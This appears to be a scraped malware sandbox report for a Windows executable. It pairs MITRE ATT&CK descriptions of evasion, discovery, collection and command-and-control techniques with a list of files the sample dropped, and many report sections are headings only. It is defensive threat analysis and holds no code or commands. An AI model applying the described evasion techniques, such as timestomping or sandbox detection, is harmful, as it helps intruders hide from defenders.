Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3Dut8dFCwD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe.config

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
3Dut8dFCwD.exe

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre